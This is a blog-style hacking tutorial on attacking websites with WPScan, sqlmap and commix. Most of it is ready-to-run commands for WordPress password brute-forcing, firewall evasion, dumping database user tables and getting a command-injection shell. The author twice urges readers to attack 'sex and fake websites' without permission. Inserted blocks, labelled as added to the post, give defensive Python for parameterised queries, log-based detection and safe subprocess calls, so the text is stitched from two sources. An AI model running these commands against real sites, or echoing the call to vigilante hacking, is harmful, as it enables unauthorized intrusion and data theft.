Website Hacking Complete Course | Web Hacking and Penetration Testing | How to Hack a Website | WpScan, Sqlmap, Commix Tools in Kali Linux | Kali Linux Tools

We know that website hacking is a main part of hacking; it is as important as system hacking. Many Kali Linux tools are used for website hacking, for example wfuzz, Sparta, Legion, Hydra, Medusa, Ncrack etc., which are used for brute force attacks. But some tools are used mainly for website hacking, like sqlmap, commix and wpscan, and these are widely used. So in this post we will discuss these website hacking tools in detail.

But the question is: why is website hacking important? The answer is that most of the internet is run through websites, and black hat hackers can destroy them for wrong purposes. So white hat hackers learn website hacking: they find vulnerabilities and fix them to secure websites. Sometimes data about a user is needed that can only be found on a website, so we hack a website to find the data about that person. We can also reach a victim by hacking the websites that the victim visits most. So there may be many purposes for website hacking.

But a hacker must take care and should not hack any website without permission, because it can cause problems for the hacker and he/she can be arrested. But every hacker must hack sex and fake websites to save the world from bad things.

a) WPSCAN:

WPScan stands for "WordPress scanner". It is a very powerful Kali Linux tool used to scan and hack websites that run on WordPress. We can find vulnerabilities in a WordPress website with WPScan, and we can also perform a brute force attack on the (username) and (password) of these WordPress websites. A hacker must learn it. It is usually pre-installed in Kali Linux, so a hacker can use it directly. Now we will discuss the main WPScan commands.

TO SEE ALL OPTIONS OF WPSCAN:

(wpscan --help)

TO UPDATE THE WPSCAN:

(wpscan --update)

TO FIND (USERNAMES), VULNERABLE PLUGINS AND VULNERABLE THEMES OF A WORDPRESS WEBSITE:

(wpscan -u <link or IP address of website> -e u,vp,vt) e.g. (wpscan -u https://192.168.1.8/wordpress/ -e u,vp,vt)

TO SKIP THE YES/NO PROMPTS DURING SCANNING:

(wpscan -u <link or IP address of website> -e u,vp,vt --batch) e.g. (wpscan -u https://192.168.1.8/wordpress/ -e u,vp,vt --batch)

TO USE A RANDOM USER AGENT AND SKIP SSL CERTIFICATE CHECKING DURING SCANNING:

(wpscan -u <link or IP address of website> -e u,vp,vt -r --disable-tls-checks) e.g. (wpscan -u https://192.168.1.8/wordpress/ -e u,vp,vt -r --disable-tls-checks)

TO SET THE REQUEST TIMEOUT, CONNECTION TIMEOUT AND NUMBER OF THREADS (REQUESTS AT A TIME) DURING SCANNING:

(wpscan -u <link or IP address of website> -e u,vp,vt --request-timeout <time> --connect-timeout <time> -t <threads> --max-threads <maximum threads>) e.g. (wpscan -u https://192.168.1.8/wordpress/ -e u,vp,vt --request-timeout 5 --connect-timeout 5 -t 4 --max-threads 6)

TO SEE DETAILED (VERBOSE) SCAN OUTPUT:

(wpscan -u <link or IP address of website> -e u,vp,vt -v) e.g. (wpscan -u https://192.168.1.8/wordpress/ -e u,vp,vt -v)

I know I put multiple options into a single command, but that is the best way: use the commands as they are, with the multiple options for bypassing, to get an easy and smooth scan.

BRUTE FORCE ATTACK ON A WORDPRESS WEBSITE WITH WPSCAN:

WPScan is mainly for WordPress websites, which we can both scan and brute force. Now I will share a single, powerful command to brute force a WordPress website.

(wpscan -u <link of WordPress website> --wordlist <path of wordlist for passwords> --username <username found during scanning> -r --disable-tls-checks --request-timeout <time> --connect-timeout <time> -t <threads> --max-threads <maximum threads> -v --batch) e.g.

(wpscan -u http://192.168.1.8/wordpress/ --wordlist /usr/share/wordlists/rockyou.txt --username admin -r --disable-tls-checks --request-timeout 4 --connect-timeout 4 -t 5 --max-threads 7 -v --batch)

When you run this command the password will be found, and you can use it to (login) to the target WordPress website. So, best of luck with WPScan for hacking WordPress websites.


[Figure: Username and password of the target website found in WPScan]

b) SQLMAP:

Sqlmap is a Kali Linux tool used to discover SQL injection vulnerabilities in a website and also to hack the website using SQL injection. It is used to attack the database of a website and to steal useful information, like stored usernames and passwords, important files etc. It is a powerful hacking tool and a hacker must learn it.

Now we will discuss the basic terms related to sqlmap and SQL injection.

1) SQL INJECTION:

SQL injection is a technique to attack and destroy the stored database of a website. It is a common vulnerability in websites, and it is used to hack them.

TYPES OF SQL INJECTION:

There are three main types of SQL injection.

2) IN-BAND SQL INJECTION:

It has two further types.

A) ERROR-BASED SQL INJECTION:

It is a type of in-band SQL injection in which we modify a parameter (such as a GET parameter) and the website answers with a database error that reveals information about the database. If changing the parameter generates an error, it means there is an SQL injection vulnerability.

B) UNION-BASED SQL INJECTION:

In this type of in-band SQL injection we combine two queries (with UNION) in one request during the attack, and the result of the second query comes back together with the first, giving us access to the website's data.

3) INFERENTIAL SQL INJECTION:

Under this we will discuss blind SQL injection:

A) BLIND SQL INJECTION:

It is a type of SQL injection in which, when we change a parameter, we cannot see any errors or output on the website. There are two further types of blind SQL injection.

a) BLIND BOOLEAN-BASED SQL INJECTION:

In this we send different Boolean queries or conditions, such as AND 1=1 or AND a=a, and if the website does not work properly with these queries (its response changes), it means the website has a blind SQL injection vulnerability.

b) BLIND TIME-BASED SQL INJECTION:

In this we apply a time delay, such as (sleep(5)#), and if the website responds only after our given time of 5 seconds, it means the website is vulnerable to blind time-based SQL injection.

4) OUT-OF-BAND SQL INJECTION:

It is an uncommon SQL injection vulnerability, and it works only when specific functions are enabled in the website.
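To make the error-based and boolean-based behaviour concrete, here is an added example (my own code, not part of the original post and not sqlmap code): a tiny in-memory SQLite "products" table, queried once by pasting the request parameter straight into the SQL text (the vulnerable form) and once with a bound parameter after an integer check (the hardened form). The product table, its rows and the helper names are all constructed for this demo.

```python
import sqlite3

# Constructed sample data: a tiny products table like one a shop page
# might query with "?id=1". Not taken from any real site.
SAMPLE_ROWS = [(1, "Laptop"), (2, "Phone"), (3, "Camera")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def product_names_unsafe(conn, user_input):
    """Vulnerable: the request parameter is concatenated into the SQL text,
    so input such as '1 AND 1=2' becomes part of the query's logic and a
    stray quote produces a database error (error-based injection)."""
    sql = "SELECT name FROM products WHERE id = " + user_input
    return [row[0] for row in conn.execute(sql)]


def product_names_safe(conn, user_input):
    """Hardened: the value is validated as an integer and then bound with a
    placeholder, so it is always treated as data, never as SQL text."""
    try:
        product_id = int(user_input)
    except ValueError:
        return []  # reject anything that is not a plain integer id
    cur = conn.execute("SELECT name FROM products WHERE id = ?", (product_id,))
    return [row[0] for row in cur]


def boolean_oracle_detectable(query_fn, conn):
    """True if a true condition (AND 1=1) and a false one (AND 1=2) appended to
    the id give different results. That difference is what blind boolean-based
    injection relies on; the hardened function rejects both inputs identically."""
    with_true = query_fn(conn, "1 AND 1=1")
    with_false = query_fn(conn, "1 AND 1=2")
    return with_true != with_false


def returns_db_error(query_fn, conn):
    """True if a single unbalanced quote makes the database raise an error,
    which is the signal error-based injection looks for."""
    try:
        query_fn(conn, "1'")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("unsafe", product_names_unsafe), ("safe", product_names_safe)):
        print(name, "boolean oracle:", boolean_oracle_detectable(fn, db),
              "db error leak:", returns_db_error(fn, db))
```

Running the block prints that the unsafe query both leaks a database error and answers differently to the true and false conditions, while the parameterised query does neither; the fix is the placeholder plus the type check, not output filtering.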

METHOD TO PERFORM SQL INJECTION:

There are five steps to perform an SQL injection attack on a website. First of all, we understand the working of the website we are attacking, for example how its login page works.

Then we discover the specific vulnerable parameters, like GET or POST parameters, to perform the SQL injection attack.

In the third step we discover the different errors in the different parameters.

Then we work out the errors in a parameter.

In the last and fifth step we attack and access the database of the website using sqlmap in Kali Linux. You can find vulnerable parameters with sqlmap.

Now we will discuss the main sqlmap commands for finding vulnerable parameters and accessing the database of a website.

TO SEE ALL OPTIONS OF SQLMAP:

(sqlmap -h)

TO FIND THE SQL-VULNERABLE LINKS OF A WEBSITE:

(sqlmap -u <main link of website> --crawl <depth level> --batch) e.g. (sqlmap -u http://vulhub.com/ --crawl 4 --batch)

TO FIND SQL INJECTION VULNERABILITIES FASTER AND MORE FORCEFULLY:

(sqlmap -u <main link of website> --crawl <depth level> --risk=<number> --level=<number> --threads <number> -v <number> --batch) e.g. (sqlmap -u http://vulhub.com/ --crawl 4 --risk=3 --level=5 --threads 10 -v 4 --batch)

After running this command sqlmap saves a file in the directory it reports, as shown in the figure. The SQL-injection-vulnerable URLs are saved in this directory.

TO SCAN WEBSITES SAVED IN A FILE:

(sqlmap -m <path of file> --crawl <depth level> --batch) e.g. (sqlmap -m /root/Desktop/sql.txt --crawl 4 --batch)

TO USE A SPECIFIC TECHNIQUE TO FIND SQL INJECTION VULNERABILITIES:

(sqlmap -u <main link of website> --crawl <depth level> --technique=<technique> --batch) e.g. (sqlmap -u http://vulhub.com/ --crawl 4 --technique=U --batch)

You can use B, E, T, S or Q instead of U; these letters are the SQL injection techniques: B for boolean-based blind, E for error-based, U for UNION query, S for stacked queries, T for time-based blind and Q for inline queries.

TO BYPASS THE FIREWALL DURING SCANNING FOR VULNERABILITIES:

(sqlmap -u <main link of website> --crawl <depth level> --headers="<any header>" --user-agent="<any user agent>" --tamper=<tamper script> -v <number> --batch) e.g. (sqlmap -u http://vulnweb.com/ --crawl 4 --headers="Referer: abc.com" --user-agent="GEKO_Chrome" --tamper=base64encode -v 4 --batch)

TO USE MOBILE USER AGENTS TO BYPASS THE FIREWALL:

(sqlmap -u <main link of website> --crawl <depth level> --mobile -v <number> --batch) e.g.

(sqlmap -u http://vulhub.com/ --crawl 4 --mobile -v 4 --batch)

Then select your mobile device, e.g. type (1) for the (Apple iPhone user agent).

TO LIST THE DATABASES OF A WEBSITE:

(sqlmap -u "<vulnerable link copied from the file after crawling>" --dbs --batch) e.g. (sqlmap -u "http://vulnweb.com/<vulnerable-page>.php?id=1" --dbs --batch)

TO BYPASS THE FIREWALL WHILE ACCESSING THE DATABASE:

(sqlmap -u "<vulnerable link>" --dbs --headers="<any header>" --user-agent="<any user agent>" --tamper=<tamper script> --batch) e.g. (sqlmap -u "http://vulnweb.com/<vulnerable-page>.php?id=1" --dbs --headers="Referer: abc.com" --user-agent="GEKO_Chrome" --tamper=base64encode --batch)

TO SEE THE CURRENT USER, CURRENT DATABASE AND HOSTNAME OF THE VULNERABLE WEBSITE:

(sqlmap -u "<vulnerable link>" --current-user --current-db --hostname --headers="<any header>" --user-agent="<any user agent>" --tamper=<tamper script> --batch) e.g. (sqlmap -u "http://vulnweb.com/<vulnerable-page>.php?id=1" --current-user --current-db --hostname --headers="Referer: abc.com" --user-agent="GEKO_Chrome" --tamper=base64encode --batch)

TO SEE THE TABLES OF A SPECIFIC DATABASE OF THE WEBSITE:

(sqlmap -u "<vulnerable link>" -D <database> --tables --batch) e.g. (sqlmap -u "http://vulnweb.com/<vulnerable-page>.php?id=1" -D acuart --tables --batch)

TO SEE THE CONTENTS OF A TABLE OF A SPECIFIC DATABASE:

(sqlmap -u "<vulnerable link>" -D <database> -T <table> --dump --batch) e.g. (sqlmap -u "http://vulnweb.com/<vulnerable-page>.php?id=1" -D acuart -T users --dump --batch)

TO SEE ALL THE DATA OF A DATABASE:

(sqlmap -u "<vulnerable link>" -D <database> --dump --batch) e.g.

(sqlmap -u "http://vulnweb.com/<vulnerable-page>.php?id=1" -D acuart --dump --batch)


[Figure: Databases found with sqlmap]

So, these were some basic and important sqlmap commands. The database of a website may store useful information like usernames, passwords, code and important files that you can use to access that website easily. You should use the options --headers, --user-agent, --tamper etc. with each sqlmap command to bypass the firewall while accessing the database. SQL injection is not allowed, but you must use sqlmap to destroy fake and sex websites. So good luck with sqlmap.
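Defenders see these tools from the other side, in the web server access log. The following is an added example (my own code, not part of the original post and not sqlmap or WPScan code) that parses a few constructed combined-format log lines and flags three things from this post: the default sqlmap and WPScan user agent strings, SQL injection patterns in query strings (the UNION, sleep() and AND 1=1 techniques described above), and a burst of POSTs to wp-login.php from one address, which is what the WPScan brute force command above produces. The log lines, IP addresses and the five-request threshold are all constructed for the demo.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2024:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2024:10:00:02 +0000] "GET /listproducts.php?cat=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.9 - - [10/May/2024:10:00:03 +0000] "GET /listproducts.php?cat=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/May/2024:10:00:04 +0000] "GET /wp-content/plugins/ HTTP/1.1" 403 120 "-" "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
10.0.0.7 - - [10/May/2024:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
10.0.0.7 - - [10/May/2024:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
10.0.0.7 - - [10/May/2024:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
10.0.0.7 - - [10/May/2024:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
10.0.0.7 - - [10/May/2024:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
10.0.0.5 - - [10/May/2024:10:00:08 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Substrings of the tools' default User-Agent headers (both can be changed
# by the attacker, so this rule alone is weak evidence).
SCANNER_AGENTS = ("sqlmap", "wpscan")

# Query-string patterns matching the injection types named in the post.
SQLI_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"\bunion\b.*\bselect\b",        # union-based
        r"\bsleep\s*\(",                 # time-based blind
        r"\b(and|or)\s+\d+\s*=\s*\d+",   # boolean-based blind (AND 1=1)
        r"'",                            # quote that triggers error-based
    )
]

LOGIN_BRUTE_THRESHOLD = 5  # POSTs to wp-login.php from one IP in the sample


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Per-line rules: scanner user agent and SQLi patterns in the query."""
    tags = []
    if any(s in entry["agent"].lower() for s in SCANNER_AGENTS):
        tags.append("scanner-user-agent")
    query = unquote_plus(entry["path"]).partition("?")[2]  # decode %20 etc.
    if query and any(p.search(query) for p in SQLI_PATTERNS):
        tags.append("sqli-pattern")
    return tags


def analyse(log_text):
    """Run per-line rules plus a per-IP count of login POSTs; return alerts."""
    alerts = []
    login_posts = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for tag in classify(entry):
            alerts.append((entry["ip"], tag))
        if entry["method"] == "POST" and entry["path"].startswith("/wp-login.php"):
            login_posts[entry["ip"]] += 1
    for ip, n in login_posts.items():
        if n >= LOGIN_BRUTE_THRESHOLD:
            alerts.append((ip, "wp-login-bruteforce"))
    return alerts


if __name__ == "__main__":
    for ip, tag in analyse(SAMPLE_LOG):
        print(ip, tag)
```

On the sample, 10.0.0.9 is flagged for the sqlmap user agent and two injection patterns, and 10.0.0.7 for the WPScan user agent and five login POSTs. The bare-quote rule is noisy on real traffic (names like O'Brien), so in production it would be weighted lower than the UNION and sleep() rules, and the login counter would use a sliding time window instead of the whole file.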

c) COMMIX:

Commix stands for "command injection exploiter". It is a very powerful Kali Linux tool used to exploit command injection vulnerabilities. When we find a command-injection-vulnerable link while scanning a website, we can access the website using commix.

When we give the command-injection-vulnerable link to commix, commix provides us a (reverse command shell) or (terminal). Then we can run any command and access the target website's files, folders, usernames, passwords and other data. In this way commix is a very dangerous Kali Linux tool, and a hacker must learn it deeply. It is usually pre-installed in Kali Linux, so we can use it directly.

Now we will discuss the main commix commands for exploiting command injection vulnerabilities.

TO SEE ALL OPTIONS OF COMMIX:

(commix -h)

TO EXPLOIT A COMMAND INJECTION VULNERABILITY:

(commix -u '<link of website>' --cookie="<cookie of website>; PHPSESSID=<session id>" --data="<vulnerable parameter>=INJECT_HERE&<other parameters>" --batch) e.g.

(commix -u 'http://192.168.1.8/dvwa/vulnerabilities/exec/' --cookie="security=low; PHPSESSID=cb1868f0c5e16fda3243f4c56f836228" --data="ip=INJECT_HERE&submit=submit" --batch)

IMPORTANT NOTE:

You can find the PHPSESSID cookie and the vulnerable parameters using Burp Suite in your Kali Linux. Open Burp Suite, click on (Proxy), then click (Intercept is off) to turn the intercept (on). Open your website and enter a wrong username or password, or any other value in the parameter that is vulnerable, and the request will be captured with all the details you need. In the commix command you must (replace) the (value you entered) in the command-injection-vulnerable parameter with (INJECT_HERE). You must follow these steps while using commix. You can also use other ways if you know about the command injection vulnerability.

TO SET AN ENCODED ATTACK AND BYPASS THE FIREWALL:

(commix -u '<link of website>' --cookie="<cookie of website>; PHPSESSID=<session id>" --data="<vulnerable parameter>" --codec='<encoding>' --skip-heuristics --batch) e.g.

(commix -u 'http://192.168.1.8/vulnweb/vulnerabilities/exec/' --cookie="security=low; PHPSESSID=cb14fbt468394puxzy48687" --data="ip=INJECT_HERE&submit=submit" --codec='ascii' --skip-heuristics --batch)


[Figure: Reverse shell in commix]

TO SET A RANDOM USER AGENT, IGNORE AN ERROR CODE, FORCE SSL, IGNORE REDIRECTIONS, SET THE TIMEOUT AND NUMBER OF RETRIES, AND IGNORE SET-COOKIE HEADERS TO BYPASS THE FIREWALL:

(commix -u '<link of website>' --cookie="<cookie of website>; PHPSESSID=<session id>" --data="<vulnerable parameter>" --random-agent --ignore-code=<error code to ignore> --force-ssl --ignore-redirects --timeout=<time> --retries=<number of retries per request> --drop-set-cookie --batch) e.g.

(commix -u 'http://192.168.1.8/dvwa/exec/' --cookie="security=low; PHPSESSID=cb132f4b8972xypq12rt3" --data="ip=INJECT_HERE&submit=submit" --random-agent --ignore-code=403 --force-ssl --ignore-redirects --timeout=20 --retries=5 --drop-set-cookie --batch)

TO SET A DELAY BETWEEN TWO REQUESTS, THE TIME TO WAIT FOR THE OS RESPONSE AND THE ATTACK LEVEL, AND TO SKIP CALCULATIONS, SKIP EMPTY PARAMETERS, SKIP WAF DETECTION, USE A MOBILE USER AGENT AND USE OFFLINE MODE, FOR A POWERFUL ATTACK THAT BYPASSES THE FIREWALL:

(commix -u '<link of website>' --cookie="<cookie of website>; PHPSESSID=<session id>" --data="<vulnerable parameter>" --delay=<delay time> --time-sec=<response time> --level=<attack level> --skip-calc --skip-empty --skip-waf --mobile --offline --batch) e.g.

(commix -u 'http://192.168.1.8/vulnweb/exec/' --cookie="security=low; PHPSESSID=cb1f2tx3f4b5n6l158ibk" --data="ip=INJECT_HERE&submit=submit" --delay=5 --time-sec=5 --level=2 --skip-calc --skip-empty --skip-waf --mobile --offline --batch)

When you run these commands, commix gives you a terminal or OS shell, and you can run any command, such as (uname -a) to see the details of the operating system or (whoami) to see the current user. This means you get access to the operating system on which the target website is running. So commix is a very (dangerous tool) of Kali Linux for hacking. But you must use the vulnerable parameter and the correct commands to get access.
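The reason a parameter like the DVWA `ip` field hands over an OS shell is that the server builds a shell command line by string concatenation. Below is an added example (my own code, not DVWA's or commix's) that shows the vulnerable pattern beside the hardened one in Python: the unsafe builder splices the request value into a `ping` command line, while the safe builder validates the value as an IP address with the `ipaddress` module and passes an argv list with `shell=False`, so no shell ever interprets it. The `shell_command_count` helper uses `shlex` in its punctuation-aware mode to count how many separate commands a POSIX shell would see in a command line; the function names and the sample values are constructed for this demo.

```python
import ipaddress
import shlex
import subprocess


def ping_command_unsafe(ip):
    """Vulnerable (DVWA-style): the request parameter is spliced into a shell
    command line. A value like '127.0.0.1; id' becomes two commands when the
    string is handed to a shell (e.g. subprocess.run(cmd, shell=True))."""
    return "ping -c 1 " + ip


def validate_ip(value):
    """Allow-list check: accept only a literal IPv4/IPv6 address, nothing else."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError as exc:
        raise ValueError(f"rejected ping target: {value!r}") from exc


def ping_command_safe(ip):
    """Hardened: validated value placed in an argv list. With shell=False the
    list goes to execve directly, so ';', '&&', '|' or backticks in the value
    can never start another command."""
    return ["ping", "-c", "1", validate_ip(ip)]


def run_ping(ip, timeout=5):
    """Execute the hardened form; only reached with a validated address."""
    return subprocess.run(ping_command_safe(ip), capture_output=True,
                          text=True, timeout=timeout, check=False)


def shell_command_count(cmdline):
    """How many commands a POSIX-style shell would run for `cmdline`: lex it
    with shlex in punctuation mode and count command separators."""
    lexer = shlex.shlex(cmdline, punctuation_chars=True)
    separators = {";", "&&", "||", "|", "&"}
    return 1 + sum(1 for tok in lexer if tok in separators)


if __name__ == "__main__":
    for value in ("127.0.0.1", "127.0.0.1; id"):
        cmd = ping_command_unsafe(value)
        print(f"unsafe: {cmd!r} -> {shell_command_count(cmd)} shell command(s)")
        try:
            print("safe  :", ping_command_safe(value))
        except ValueError as err:
            print("safe  :", err)
    try:
        print(run_ping("127.0.0.1").returncode)
    except FileNotFoundError:
        print("ping binary not available on this host")
```

The lesson is the same as for SQL injection: the fix is structural (argv list, no shell, strict input type), not a blacklist of characters. A value that passes `ipaddress.ip_address` cannot contain a shell metacharacter, and even if validation were skipped, the list form gives the shell no chance to split it.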

Here I have discussed the main commix commands for exploiting command injection vulnerabilities in websites. You can use multiple options in your commands for an effective attack, but you should use only the important options. Another important thing is that attacking a website with any tool is not allowed, so you must use it for ethical purposes only. So best of luck with commix.

 
